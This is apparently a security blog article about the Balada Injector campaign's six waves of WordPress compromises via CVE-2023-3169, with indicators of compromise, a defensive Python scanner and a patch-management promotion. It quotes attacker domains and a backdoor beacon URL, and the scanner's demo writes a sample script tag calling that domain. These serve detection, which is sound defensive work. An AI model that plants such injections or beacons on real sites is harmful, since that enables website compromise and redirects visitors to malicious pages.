A new Balada Injector campaign used known WordPress plugin and theme vulnerabilities to hack over 17,000 websites during September 2023.
Threat actors exploited CVE-2023-3169, a cross-site scripting (XSS) vulnerability in tagDiv Composer, a tool for tagDiv's Newspaper and Newsmag WordPress themes.
Both are paid themes, and together they are used by 155,500 websites.
The attackers aim to create backdoors and deploy malware that diverts website visitors to malicious sites, like:
- spoofed tech support pages
- fake lottery wins
- push notification hoaxes, etc.
Threat actors often rely on known but unpatched vulnerabilities to compromise websites. In April 2023 Sucuri reported that Balada Injector has been active since 2017. Over those years, Balada Injector has successfully hacked one million WordPress sites.
The attacks restarted in mid-September after security specialists revealed CVE-2023-3169 details and a Proof-of-Concept exploit. Researchers identified and described six distinct attack waves of this new Balada Injector campaign.
What connects the six recent Balada Injector attack waves?
Sucuri identified six different attack waves of the Balada Injector campaign. In all cases, the malicious actors exploited unpatched vulnerabilities to launch further operations.
Wave 1
Hackers injected malware loaded from stay.decentralappps[.]com to compromise the websites. The XSS vulnerability allowed the injected code to be rendered on the sites' public pages. More than 5,000 sites were impacted.
Wave 2
The adversaries used a malicious script to create fake WordPress admin accounts. At first they used the "greeceman" username, then they switched to auto-generated usernames based on the site's hostname.
"greeceman" still appears on many of the compromised domains.
Search [greeceman inurl:author] on Google to see the websites containing this malicious admin. In the results you'll find websites that use the Newspaper theme. A lot of them are still infected with the Balada malware.
Wave 3
In the third wave, hackers abused WordPress's built-in theme editor to plant backdoors in the Newspaper theme's 404.php file. Once the backdoor is in place in 404.php, a notification is sent to the Balada Injector operators.
The message is sent via a call to stock.decentralappps[.]com/dest.php?d1=<window.location.hostname> and confirms that a backdoor is available on that specific site.
Wave 4
Attackers moved on to installing a malicious plugin named wp-zexit, which mimicked legitimate WordPress admin behaviour and hid the backdoor behind the website's Ajax interface.
Wave 5
Threat actors registered three new domains and increased the randomization of the injected scripts, URLs, and code. This change was meant to make tracking and detection harder for security teams.
Wave 6
The last wave of Balada injections that Sucuri described started on September 29th. It involved several different scripts that used subdomains of promsmotion[.]com to deploy malware. The attackers stopped using stay.decentralappps[.]com and deployed only three specific injections.
All three types of promsmotion injections affect websites that use the Newspaper theme, and they usually work together with other Balada malware. In this wave, instead of exploiting the tagDiv Composer vulnerability, the hackers used the backdoors and rogue admin users they had created earlier.
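The six waves leave host-level traces a defender can look for: rogue administrator accounts, a modified 404.php in the Newspaper theme, the wp-zexit plugin directory, and references to the Balada domains in site files. The scanner below is an added example written for this article (not Sucuri's or Heimdal's tooling); it assumes the administrator usernames are supplied by the caller (for instance from `wp user list --role=administrator --field=user_login`) and treats the hostname-based username check as a heuristic that needs review.

```python
import os
import re
import tempfile

# Indicators quoted in the article (the defanged "[.]" is written as a plain dot for matching).
BALADA_DOMAINS = ("stay.decentralappps.com", "stock.decentralappps.com", "promsmotion.com")
DOMAIN_RE = re.compile("|".join(re.escape(d) for d in BALADA_DOMAINS))
ROGUE_PLUGIN = "wp-zexit"
ROGUE_USER = "greeceman"


def scan_wordpress(root, hostname, admin_users):
    """Return (indicator, detail) findings for the WordPress install at `root`.

    `admin_users` lists administrator usernames; `hostname` is the site's hostname and is
    used for the heuristic wave-2 check (admin names derived from the hostname)."""
    findings = []
    label = hostname.split(".")[0].lower()
    for user in admin_users:  # wave 2: rogue admin accounts
        if user == ROGUE_USER or label in user.lower():
            findings.append(("rogue_admin", user))
    if os.path.isdir(os.path.join(root, "wp-content", "plugins", ROGUE_PLUGIN)):
        findings.append(("rogue_plugin", ROGUE_PLUGIN))  # wave 4: malicious plugin
    for dirpath, _, files in os.walk(root):  # waves 1, 3, 6: Balada domains in site files
        for name in files:
            if not name.endswith((".php", ".js", ".html")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                for match in DOMAIN_RE.finditer(fh.read()):
                    # A callback in 404.php is the wave-3 backdoor beacon; elsewhere it is an injection.
                    kind = "backdoor_404" if name == "404.php" else "injected_domain"
                    findings.append((kind, f"{os.path.relpath(path, root)}: {match.group(0)}"))
    return findings


def demo():
    """Build a constructed (not real) compromised install in a temp dir and scan it."""
    root = tempfile.mkdtemp()
    theme = os.path.join(root, "wp-content", "themes", "Newspaper")
    os.makedirs(theme)
    os.makedirs(os.path.join(root, "wp-content", "plugins", ROGUE_PLUGIN))
    with open(os.path.join(theme, "404.php"), "w") as fh:  # wave-3 style beacon, constructed
        fh.write("<?php get_header(); ?>\n<script src='https://stock.decentralappps.com/dest.php?d1=x'></script>")
    with open(os.path.join(theme, "header.php"), "w") as fh:  # clean file, must not be flagged
        fh.write("<?php wp_head(); ?>")
    return scan_wordpress(root, "victim-site.example", ["editor", "greeceman", "victim-site-adm"])
```

Run `demo()` to see the four findings the constructed install produces; on a real install, pass the site root, its hostname and the admin list exported from WP-CLI.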
Why are known vulnerabilities not patched in time?
The Balada Injector case tells an unsettling truth: hackers can still exploit six-year-old vulnerabilities that have been disclosed and patched since 2017.
It's not only WordPress theme vulnerabilities that remain unpatched. According to Gartner, 99% of the vulnerabilities that hackers exploit to breach systems were known for at least one year.
There are two main reasons why IT admins don't patch known vulnerabilities in time:
- Lack of awareness of how important it is to apply an update as fast as possible.
- The system administrator knows how important patching is but is overwhelmed with other tasks, or fails to assess correctly which vulnerability poses the greater risk and should be patched first. You can't apply all necessary patches at once, and manual patching is a slow and resource-consuming task.
To stop known vulnerabilities from causing problems, I recommend using an automated patch management solution.
Automated patch management covers the whole patch management process, from scanning to testing, deploying, and reporting, and requires the least effort from the IT team.
Some of the benefits of automated patch management solutions are:
- less pressure on the IT team,
- increased compliance with the latest security regulations,
- increased productivity,
- reduced downtime,
- no more human error.
If you haven't tried an automated patch management solution yet, check out this 30-day free trial and see what it can do for you.